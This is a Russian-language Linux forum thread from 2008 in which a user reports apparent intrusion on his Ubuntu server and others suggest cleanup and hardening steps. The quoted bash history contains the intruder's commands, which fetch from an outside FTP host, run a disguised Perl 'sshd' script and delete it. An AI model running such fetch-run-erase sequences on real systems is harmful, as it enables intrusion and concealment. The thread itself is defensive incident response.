Вот так новости... взломали? (что это может быть?)

Обсуждение настройки и работы сервисов, резервирования, сетевых настроек и вопросов безопасности ОС.

Модераторы: SLEDopit, Модераторы разделов

pelmen
Сообщения: 1268
ОС: debian

Вот так новости... взломали?

Сообщение pelmen »

зашел по ссш на свой сервер, на который только я могу зайти. Недавно его установил, буквально неделю назад. Никто не знает ни логинов ни паролей. Рута нет (там убунта), едиственный пользователь имеет права на судо. Так вот, захожу на него, смотрю, чего я там последний раз делал (стрелочками вверх-вверх) и не узнаю комманд. Я такие не то, что не помню, даже не знаю. Полез в ~/.bash_history и увидел там такое:

Код: Выделить всё

ps -e
w
ftp ftp.extra.hu
nohup perl sshd 75.0.0.0 i.e
rm rf sshd
rm -rf sshd
ls l
ls -l
clear
exit
w
uptime
первые две и последние две - признаюсь, это вводил я. НО фтп, нохуп и рм!!! Я так понял, что кто-то подключился, скачал с фтп скрипт перловый под названием ссшд, запустил его (опции 75.0.0.0 i.e я не понимаю) а потом удалил его. Че теперь делать? Подскажите, что это может быть? Как бы Вы дальше поступили?
Спасибо сказали:
Аватара пользователя
Ленивая Бестолочь
Бывший модератор
Сообщения: 2760
ОС: Debian; gentoo

Re: Вот так новости... взломали?

Сообщение Ленивая Бестолочь »

проверьтесь сканером руткитов, например rkhunter для начала.
Солнце садилось в море, а люди с неоконченным высшим образованием выбегали оттуда, думая, что море закипит.
Спасибо сказали:
Аватара пользователя
Goodvin
Ведущий рубрики
Сообщения: 4333
Статус: ⚝⚠⚒⚑⚖☭☞☣☤&

Re: Вот так новости... взломали?

Сообщение Goodvin »

Читать системные логи, например.
Спасибо сказали:
pelmen
Сообщения: 1268
ОС: debian

Re: Вот так новости... взломали?

Сообщение pelmen »

логи я читал (/var/log/auth.log) а что еще почитать, и, самое главное, что делать, когда в логах увижу этого гада? Т.е. он эту хрень свою запускал без судо, т.е. не мог напакостить системе. Может быть rm -rf ~/* поможет? :) или это слишком кординально?
Интересно то, что когда я только это заметил, у меня еще вверху было написано
Last login: Thu Dec 18 09:55:08 2008 from $MY_IP_ADDRESS !!!
Вот это-то и поразило, что и время было и правда то, когда я последний раз заходил, и мой айпишнк!
Делаю cat /var/log/auth.log*|grep Accepted и вижу только свой ip-адрес
Таким образом, либо в этом скрипте была строчка sudo что-то там, и он заразил систему чем-то, поудалял все следы, в том числе и лог самого запуска судо, они ведь тоже записываются (только вот про то, на что я наткнулся забыл) и ушел.
Спасибо сказали:
Аватара пользователя
Ленивая Бестолочь
Бывший модератор
Сообщения: 2760
ОС: Debian; gentoo

Re: Вот так новости... взломали?

Сообщение Ленивая Бестолочь »

скорее всего вам поставили руткит и пользуются им.
теперь взломщикам нет необходимости заходить через ssh, пользоваться sudo и т.п.
по этому логи нужно читать очень внимательно.

1) просканируйте систему снаружи чем-нибудь, например nmap на предмет всяких странных портов открытых, типа 31337 и т.п.
2) найдите этот sshd в процессах. (ps ax | grep sshd), получаете pid, смотрите ls -la /proc/<pic>/exe куда указывает симлинк, чтобы определить, какой из sshd "нечестный", убиваете его нафиг.
3) смотрите какая версия ssh у вас, читаете в гугле, нет ли багрепортов, обновляетесь.
4) меняете пароль/логин своего юзера, рута и т.п.
5) просканируйтесь наконец rkhunter-ом.
6) поставьте denuhosts, или что-либо аналогичное с параметрами "пожестче"
7) вообще систему "причешите" - если сами не пользуетесь регулярно - уберите нафиг wget, li(y)nx, ftp и прочие вещи, с помощью которых можно что-нибудь скачать. компиляторы тоже в топку. судо только с паролем пользуйте.
Солнце садилось в море, а люди с неоконченным высшим образованием выбегали оттуда, думая, что море закипит.
Спасибо сказали:
pelmen
Сообщения: 1268
ОС: debian

Re: Вот так новости... взломали?

Сообщение pelmen »

Ахринеть! Я сделал ps -ax а там этих perl sshd 75.0.0.0 i.e процессов штук 40. Я просто сделал killall perl, они все пропали, далее я сделал пароль на рута (его по-умолчанию нет в убунте, только судо на админа), и убрал единственного пользователя из судуеров. /proc/<pic> - это что? такого нет. pid? тоже нет.
разобрался, увидел только ссш (я ведь перл убил) причем другой ссш, который 18тыщ пид, остальные раньше 7000. ехе указывает на /usr/sbin/sshd
У вас нет необходимых прав для просмотра вложений в этом сообщении.
Спасибо сказали:
pelmen
Сообщения: 1268
ОС: debian

Re: Вот так новости... взломали?

Сообщение pelmen »

что я сделал далее: у мебя iptables был настроен так:
default policy: input, output, forward - accept;
nat-prerouting -j snat --to-source $wan_IP;
и все. Теперь же я решил сделать так:
default policy: input drop, output, forward accept;
input -s $myhomeip accept
input -m satate --state related,established -j accept
ну и у ссш сделал подключение с $myhomeip без пароля.
Спасибо сказали: